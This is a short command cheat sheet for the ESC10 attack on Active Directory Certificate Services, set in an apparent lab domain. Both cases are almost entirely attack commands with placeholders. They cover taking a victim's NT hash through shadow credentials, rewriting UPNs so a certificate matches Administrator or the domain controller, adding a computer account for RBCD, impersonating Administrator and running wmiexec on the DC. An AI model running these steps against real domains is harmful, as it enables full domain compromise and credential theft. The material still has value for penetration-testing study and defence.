ESC10
Case 1
Reviewing registry keys as Administrator
bob$ python3 reg.py minions.com/'Administrator':'<pass>'@<IP_address> query -keyName 'HKLM\SYSTEM\CurrentControlSet\Services\Kdc'
If we get StrongCertificateBindingEnforcement REG_DWORD 0x0
we can proceed.
Retrieve the victim's NT Hash
bob$ certipy shadow auto -u <user> -p <pass> -account <victim>
Change user2 UPN to Administrator
bob$ certipy account update -u <user> -p <pass> -user <victim> -upn administrator@minions.com
Request certificate
bob$ certipy req -u <user> -hashes <hash> -ca <ca_name> -template <template_name>
we change back the UPN of <victim>
to be sure that only Administrator
matches the certificate.
Revert changes of <victim>
(to be sure that only Administrator
matches the certificate)
bob$ certipy account update -u <user> -p <pass> -user <victim> -upn <victim>@minions.com
Authenticate as the Administrator
bob$ certipy auth -pfx administrator.pfx -domain minions.com
Case 2
Using reg.py to query registry from Linux
bob$ python3 reg.py minions.com/Administrator:'<pass>'@<IP_address> query -keyName 'HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL'
Update account to mach DC machine name
bob$ certipy account update -u '<user>' -p '<pass>' -user <victim> -upn '<dc_machine_name>$@minions.com'
Request a certificate as <victim>
to get the domain controller certificate
bob$ certipy req -u <victim>@minions.com -hashes <hash_value> -ca <ca_name> -template <template_name>
Revert changes of <victim>
(to be sure that only Administrator
matches the certificate)
bob$ certipy account update -u '<user>' -p '<pass>' -user <victim> -upn '<victim>$@minions.com'
Creating a new computer account
bob$ certipy auth -pfx <dc_machine_name>.pfx -domain minions.com -dc-ip <dc_ip_address> -ldap-shell
# add_computer <new_account_name> <new_account_pass>
# set_rbcd <dc_machine_name>$ <new_account_name>$
Abusing RBCD to Impersonate the Administrator
bob$ impacket-getST -spn cifs/<dc_machine_name>$@minions.com -impersonate Administrator -dc-ip <dc_ip_address> minions.com/'<new_account_name>$':<new_account_pass>
Connect using the Administrator TGT
bob$ export KRB5CCNAME=Administrator.ccache
bob$ impacket-wmiexec -k -no-pass <dc_machine_name>.minions.com